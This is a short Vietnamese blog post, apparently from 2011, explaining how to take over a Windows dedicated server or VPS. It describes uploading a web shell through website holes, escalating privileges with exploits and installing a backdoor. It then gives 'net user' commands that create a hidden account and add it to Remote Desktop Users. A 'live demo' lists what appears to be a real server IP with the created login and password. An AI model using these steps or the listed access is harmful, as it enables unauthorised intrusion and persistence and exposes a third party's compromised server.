{1} Trước tiên các bạn cần phải có 1 con Shell trên server có khả năng sử dụng command line (Ở đây các bạn có thể khai thác các lỗ hổng của website để up shell).
{2} Cần phải có full quyền Administrator/Root cho user. Nếu tài khoản user trên server đang sử dụng không có full quyền thì bạn có thể dùng exploit shellcode để khai thác nâng quyền.
{3} Sau khi có shell trên server, các bạn có thể cài backdoor hoặc sử dụng ngay chức năng run CMD trên shell của bạn.
{4} Tạo 1 user mới trên server bằng lệnh. Trong đó lht192 là User và 123456 là mật khẩu:
net user lht192 123456 /ADD
net localgroup "Remote Desktop Users" lht192 /ADD
The command completed successfully.
Live Demo [14/07/2011]:
Server IP: 210.245.81.159
Username: lht192
Password: lht192
Chiếm quyền Dedicated Windows Server (VPS)
Views:
0 comments:
Post a Comment